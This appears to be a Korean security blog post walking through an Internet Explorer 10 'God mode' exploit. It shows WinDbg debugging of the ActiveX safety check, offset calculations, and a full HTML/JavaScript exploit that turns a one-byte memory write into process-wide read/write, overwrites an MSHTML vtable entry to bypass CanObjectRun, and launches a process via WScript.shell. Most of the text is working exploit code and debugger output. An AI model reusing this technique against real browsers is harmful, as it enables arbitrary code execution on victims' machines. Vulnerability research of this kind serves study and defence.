# IE 10  Exploit (using God mode)


activex object 중 아래 소스에 포함된 wscript.shell 과 같이 권한이 너무 강력해서 취약한 object 는 


보안 정책에 의해 default 로 사용이 불가하다. 허용으로 바꿔준다 하더라도 경고창에서 직접 승인을 눌러줘야만 한다.


=====================================

<html>

<head>

<script language="javascript">

  shell = new ActiveXObject("WScript.shell");

  shell.Exec('calc.exe');

</script>

</head>

<body>

</body>

</html>

=====================================



하지만, 아래와 같은 단계로 우회가 가능하다.


1) 먼저, 특정 주소의 값을 바꿀 수 있는 상태여야 한다.


  ex1)  js array length modify


  ex2) flash vector length modify


    => 보통 1 byte 변조로 객체 length 변조 후, 변조된 객체로 2차 다른 객체의 길이를 0x3fffffff 등으로 바꿔서 전체 프로세스 메모리 접근 권한을 획득함

      => cve-2014-0322(snowman) 참고(값 1 증가 uaf)


2) jscript9!ScriptEngine::CanObjectRun 함수 내부의 객체(s_apfnPlainTearoff) 의 vtable 을 조작하여 CanObjectRun 함수 결과값을 항상 true 로 조작


3) 자바스크립트로  calc 마음대로 실행 가능(Godmode on)



이러한 방법으로 임의코드 실행을 하는 것을 godmode 를 이용한 Exploit 이라 부른다. VBScript 에서도 된다고 함.





====== 디버깅 과정 ======



1) 허용하시겠습니까? alert 창 상태에서 BP 걸고 콜스택을 통해 호출 함수 확인 



0:007> x user32!create*


브뽀 걸리면 


0:012> kb 10

 # ChildEBP RetAddr  Args to Child              

00 047aacf4 71003ccf 00000000 66e6bc38 047aadcc user32!CreateWindowExW

01 047aad34 66e4697a 00000000 66e6bc38 047aadcc IEShims!NS_HangResistanceInternal::APIHook_CreateWindowExW+0x64

02 047aad74 66dd213d 00000000 66e6bc38 047aadcc IEFRAME!SHFusionCreateWindowEx+0x47

03 047aaed0 66dd1f39 047aaf24 00000fa6 047aaf68 IEFRAME!UnifiedFrameAware_AcquireModalDialogLockAndParent+0x3c1

04 047aaf1c 66dd1e23 00000000 047aaf48 047aaf68 IEFRAME!UnifiedFrameAware_AcquireModalDialogLockAndParent+0xea

05 047aaf3c 7101a148 001005bc 047aaf68 047aaf54 IEFRAME!TabWindowExports::AcquireModalDialogLockAndParent+0x1b

06 047aaf58 76cc5742 76c30000 00000fa6 001005bc IEShims!NS_UISuppression::APIHook_DialogBoxParamW+0x31

07 047ab788 76ceba1c 001005bc 00000fa6 76cc3058 urlmon!CSecurityManager::DisplayMessage+0x40

08 047abb2c 76c70f7b 0cb6835c 00001204 047abbdc urlmon!memset+0x11504

09 047abb70 65ff5a0b 05b9bc78 0cb6835c 00001204 urlmon!CSecurityManager::ProcessUrlActionEx2+0x15f

0a 047abbe4 65ff5b07 00001204 047abc54 00000000 MSHTML!CMarkup::ProcessURLAction2+0x31d

0b 047abc14 66b35f88 00001204 047abc54 00000000 MSHTML!CMarkup::ProcessURLAction+0x3e

0c 047abca0 660c2e27 00000001 65f36348 0d32a9a4 MSHTML!memcpy+0xff91b

0d 047abce4 6e85bb25 0b4da290 6e85bb60 047abd1c MSHTML!CDocument::HostQueryCustomPolicy+0x148

0e 047abd5c 6e85b79c 0d32a9a4 00000002 01d13120 jscript9!ScriptEngine::CanObjectRun+0x78

0f 047abda8 6e85b5cf 00000000 047abdd4 5bda28d7 jscript9!ScriptSite::CreateObjectFromProgID+0xdf



 jscript9!ScriptEngine::CanObjectRun+0x78 이 부분을 통해 실행 여부가 결정됨.


또한, 해당 함수는 CreateObjectFromProgID 내부에서 호출됨.







2) 함수 분석



# CreateObjectFromProgID 분석


0:012> uf jscript9!ScriptSite::CreateObjectFromProgID


jscript9!ScriptSite::CreateObjectFromProgID:

6e85b6b9 8bff            mov     edi,edi

6e85b6bb 55              push    ebp

                ...(중략)...

6e85b78c 8b4ddc          mov     ecx,dword ptr [ebp-24h]

6e85b78f ff33            push    dword ptr [ebx]

6e85b791 8b4904          mov     ecx,dword ptr [ecx+4]

6e85b794 8d55ec          lea     edx,[ebp-14h]

6e85b797 e811030000      call    jscript9!ScriptEngine::CanObjectRun (6e85baad)   // CanObjectRun 결과에 따라서 실행여부 결정

6e85b79c 85c0            test    eax,eax                      

6e85b79e 0f844c7c0800    je      jscript9!ScriptSite::CreateObjectFromProgID+0xfd (6e8e33f0)  Branch



포인트는 CanObjectRun 결과값 (EAX) 이 0 만 아니면 참이 되어 곧바로 실행 된다는 것!!(godmode)!



이를 위해 CanObjectRun 을 분석하여 0이 아닌 값을 리턴하도록 조작해줘야 한다. 내부에서 사용되는 객체 하나의 VTable 을 조작한다.



# CanObjectRun 분석


0:006> uf jscript9!ScriptEngine::CanObjectRun

jscript9!ScriptEngine::CanObjectRun:

6e85baad 8bff            mov     edi,edi

6e85baaf 55              push    ebp

6e85bab0 8bec            mov     ebp,esp

6e85bab2 83ec48          sub     esp,48h

               ...(중략)...

6e85bb12 52              push    edx

6e85bb13 8d55c0          lea     edx,[ebp-40h]

6e85bb16 52              push    edx

6e85bb17 6860bb856e      push    offset jscript9!GUID_CUSTOM_CONFIRMOBJECTSAFETY (6e85bb60)

6e85bb1c 895de4          mov     dword ptr [ebp-1Ch],ebx

6e85bb1f 8b08            mov     ecx,dword ptr [eax]

6e85bb21 50              push    eax

6e85bb22 ff5114          call    dword ptr [ecx+14h]         // 이 호출을 조작하기 위해 VTable 을 덮어씀 

 

                                                 => 이 호출 직전 eax 는 0이 아니므로, 이 상태로 call 명령과 동시에 함수가 바로 종료되도록 에필로그로 덮어씀


=> VTable 은 항상 일정한 Offset 이고, 취약점으로 메모리 읽기/쓰기가 가능하므로 조작 가능



# 조작할 오프셋 구하기


009> bp  jscript9!ScriptEngine::CanObjectRun+0x75

009> g


jscript9!ScriptEngine::CanObjectRun+0x75:

6e85bb22 ff5114          call    dword ptr [ecx+14h]  ds:0023:66b67884={MSHTML!TearoffThunk5 (6601e30e)}



0:012> ln @ecx      //   현재 호출된 객체 심볼 확인


Exact matches:

    MSHTML!s_apfnPlainTearoffVtable = <no type information>




0:012> dds ecx     //  VTable 확인  

66b67870  65f3dd56 MSHTML!PlainQueryInterface

66b67874  65f3d69d MSHTML!CAPProcessor::AddRef

66b67878  65f3d6b5 MSHTML!PlainRelease

66b6787c  65f3c1d2 MSHTML!TearoffThunk3

66b67880  6601b017 MSHTML!TearoffThunk4

66b67884  6601e30e MSHTML!TearoffThunk5

66b67888  6601f130 MSHTML!TearoffThunk6

66b6788c  6637e99d MSHTML!TearoffThunk7



원래 호출되는 주소는 VTable 에서 0x14 떨어진 6번째 함수임(MSHTML!TearoffThunk5). 이 주소를 에필로그 주소로 덮어씀






# 덮어써야할 주소 =>  VTable Offset 계산


0:012> ? MSHTML!s_apfnPlainTearoffVtable-mshtml

Evaluate expression: 13006960 = 00c67870



# 덮어쓸 주소 => 에필로그 Offset 계산


0:012> ? 6e85bb5c  - jscript9

Evaluate expression: 899932 = 000dbb5c



# mshtml base addr 구하기  =>  div element 생성하면 + 0x10 에 MSHTML!CBaseTypeOperations::CBaseFinalizer 주소가 있음.


0:023> ? MSHTML!CBaseTypeOperations::CBaseFinalizer - mshtml

Evaluate expression: 249949 = 0003d05d



이제 전체 코드를 실행하고 alert 창이 뜨면 TypedArray<int> 객체의 length 를 변조해 준다.


힙스프레이를 통해 항상 0x0c0af000 에 위치한다.



0:023> dd 0x0c0af000

0c0af000  68d238c8 057e98a0 00000000 00000003

0c0af010  00000004 00000000 00000016 0225baa0

0c0af020  05da2e20 00000000 00000000 00000000

0c0af030  68d238c8 057e98a0 00000000 00000003

0c0af040  00000004 00000000 00000016 0225baa0

0c0af050  05da2e20 00000000 00000000 00000000

0c0af060  68d238c8 057e98a0 00000000 00000003

0c0af070  00000004 00000000 00000016 0225baa0



0:020> ed 0x0c0af018 0x20000000



0:023> dd 0x0c0af000

0c0af000  68d238c8 057e98a0 00000000 00000003

0c0af010  00000004 00000000 20000000 0225baa0

0c0af020  05da2e20 00000000 00000000 00000000

0c0af030  68d238c8 057e98a0 00000000 00000003

0c0af040  00000004 00000000 00000016 0225baa0

0c0af050  05da2e20 00000000 00000000 00000000

0c0af060  68d238c8 057e98a0 00000000 00000003

0c0af070  00000004 00000000 00000016 0225baa0



정상적으로 calc 가 실행된다.



<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<script language="javascript">
  (function() {
    alert("Starting!");
 
    //-----------------------------------------------------
    // From one-byte-write to full process space read/write
    //-----------------------------------------------------
 
    a = new Array();
 
    // 8-byte header | 0x58-byte LargeHeapBlock
    // 8-byte header | 0x58-byte LargeHeapBlock
    // 8-byte header | 0x58-byte LargeHeapBlock
    // .
    // .
    // .
    // 8-byte header | 0x58-byte LargeHeapBlock
    // 8-byte header | 0x58-byte ArrayBuffer (buf)
    // 8-byte header | 0x58-byte LargeHeapBlock
    // .
    // .
    // .
    for (i = 0; i < 0x200; ++i) {
      a[i] = new Array(0x3c00);
      if (i == 0x80)
        buf = new ArrayBuffer(0x58);      // must be exactly 0x58!
      for (j = 0; j < a[i].length; ++j)
        a[i][j] = 0x123;
    }
    
    //    0x0:  ArrayDataHead
    //   0x20:  array[0] address
    //   0x24:  array[1] address
    //   ...
    // 0xf000:  Int32Array
    // 0xf030:  Int32Array
    //   ...
    // 0xffc0:  Int32Array
    // 0xfff0:  align data
    for (; i < 0x200 + 0x400; ++i) {
      a[i] = new Array(0x3bf8)
      for (j = 0; j < 0x55; ++j)
        a[i][j] = new Int32Array(buf)
    }
    
    //            vftptr   =>  jscript9!Js::TypedArray<int>
    // 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20000016 08ce0020
    // 0c0af020: 03133de0                                             array_len buf_addr
    //          jsArrayBuf
    alert("Set byte at 0c0af01b to 0x20"); 
    
    // Now let's find the Int32Array whose length we modified.
    int32array = 0;
    for (i = 0x200; i < 0x200 + 0x400; ++i) {
      for (j = 0; j < 0x55; ++j) {
        if (a[i][j].length != 0x58/4) {
          int32array = a[i][j];
          break;
        }
      }
      if (int32array != 0)
        break;
    }
    
    if (int32array == 0) {
      alert("Can't find int32array!");
      window.location.reload();
      return;
    }
 
    // This is just an example.
    // The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
    // The next LargeHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
    // The value in parentheses, at 03c1f178+0x60+0x24, points to the following
    // LargeHeapBlock.
    //
    // 03c1f178: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    // 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
    // 03c1f1b8: 00000000 00000000 00000000 00000000 00000000 00000000 014829e8 8c000000
    // 03c1f1d8: 70796e18 00000003 08100000 00000010 00000001 00000000 00000004 0810f020
    // 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 00000000 03c15b40 08100000
    // 03c1f218: 00000000 00000000 00000000 00000004 00000001 00000000 01482994 8c000000
    // 03c1f238: ...
 
    // We check that the structure above is correct (we check the first LargeHeapBlocks).
    // 70796e18 = jscript9!LargeHeapBlock::`vftable' = jscript9 + 0x6e18
    var vftptr1 = int32array[0x60/4],
        vftptr2 = int32array[0x60*2/4],
        vftptr3 = int32array[0x60*3/4],
        nextPtr1 = int32array[(0x60+0x24)/4],
        nextPtr2 = int32array[(0x60*2+0x24)/4],
        nextPtr3 = int32array[(0x60*3+0x24)/4];
    if (vftptr1 & 0xffff != 0x6e18 || vftptr1 != vftptr2 || vftptr2 != vftptr3 ||
        nextPtr2 - nextPtr1 != 0x60 || nextPtr3 - nextPtr2 != 0x60) {
      alert("Error!");
      window.location.reload();
      return;
    }  
    
    buf_addr = nextPtr1 - 0x60*2;
    
    // Now we modify int32array again to gain full address space read/write access.
    if (int32array[(0x0c0af000+0x1c - buf_addr)/4] != buf_addr) {
      alert("Error!");
      window.location.reload();
      return;
    }  
    int32array[(0x0c0af000+0x18 - buf_addr)/4] = 0x20000000;        // new length
    int32array[(0x0c0af000+0x1c - buf_addr)/4] = 0;                 // new buffer address
 
    function read(address) {
      var k = address & 3;
      if (k == 0) {
        // ####
        return int32array[address/4];
      }
      else {
        alert("to debug");
        // .### #... or ..## ##.. or ...# ###.
        return (int32array[(address-k)/4] >> k*8) |
               (int32array[(address-k+4)/4] << (32 - k*8));
      }
    }
    
    function write(address, value) {
      var k = address & 3;
      if (k == 0) {
        // ####
        int32array[address/4] = value;
      }
      else {
        // .### #... or ..## ##.. or ...# ###.
        alert("to debug");
        var low = int32array[(address-k)/4];
        var high = int32array[(address-k+4)/4];
        var mask = (1 << k*8) - 1;  // 0xff or 0xffff or 0xffffff
        low = (low & mask) | (value << k*8);
        high = (high & (0xffffffff - mask)) | (value >> (32 - k*8));
        int32array[(address-k)/4] = low;
        int32array[(address-k+4)/4] = high;
      }
    }
    
    //---------
    // God mode
    //---------
    
    // At 0c0af000 we can read the vfptr of an Int32Array:
    //   jscript9!Js::TypedArray<int>::`vftable' @ jscript9+3b60
    //jscript9 = read(0x0c0af000) - 0x3b60; 원본 
    jscript9 = read(0x0c0af000) - 0x38c8; // by hyunmini
    
    // Now we need to determine the base address of MSHTML. We can create an HTML
    // object and write its reference to the address 0x0c0af000-4 which corresponds
    // to the last element of one of our arrays.
    // Let's find the array at 0x0c0af000-4.
    
    for (i = 0x200; i < 0x200 + 0x400; ++i)
      a[i][0x3bf7] = 0;
    
    // We write 3 in the last position of one of our arrays. IE encodes the number x
    // as 2*x+1 so that it can tell addresses (dword aligned) and numbers apart.
    // Either we use an odd number or a valid address otherwise IE will crash in the
    // following for loop.
    write(0x0c0af000-4, 3);
 
    leakArray = 0;
    for (i = 0x200; i < 0x200 + 0x400; ++i) {
      if (a[i][0x3bf7] != 0) {
        leakArray = a[i];
        break;
      }
    }
    if (leakArray == 0) {
      alert("Can't find leakArray!");
      window.location.reload();
      return;
    }
    
    function get_addr(obj) {
      leakArray[0x3bf7] = obj;
      return read(0x0c0af000-4, obj);
    }
    
    // Back to determining the base address of MSHTML...
    // Here's the beginning of the element div:
    //      +----- jscript9!Projection::ArrayObjectInstance::`vftable'
    //      v
    //   70792248 0c012b40 00000000 00000003
    //   73b38b9a 00000000 00574230 00000000
    //      ^
    //      +---- MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
    var addr = get_addr(document.createElement("div"));
    //mshtml = read(addr + 0x10) - 0x58b9a;  원본 
    mshtml = read(addr + 0x10) - 0x3d05d; // by hyunmini
 
    // We want to overwrite mshtml+0xc555e0+0x14 with jscript9+0xdc164 where:
    //   * mshtml+0xc555e0 is the address of the vftable we want to modify;
    //   * jscript9+0xdc164 points to the code "leave / ret 4".
    // As a result, jscript9!ScriptEngine::CanObjectRun returns true.
 
    //var old = read(mshtml+0xc555e0+0x14);   // 원본 
    var old = read(mshtml+0xc67870+0x14);   // by hyunmini
    //write(mshtml+0xc555e0+0x14, jscript9+0xdc164);      // God mode on! 원본 
    write(mshtml+0xc67870+0x14, jscript9+0xdbb5c);      // God mode on! by hyunmini
    
    shell = new ActiveXObject("WScript.shell");
    shell.Exec('calc.exe');
 
    write(mshtml+0xc67870+0x14, old);      // God mode off! by hyunmini
    
    alert("All done!");
  })();
 
</script>
</head>
<body>
</body>
</html>




+ Recent posts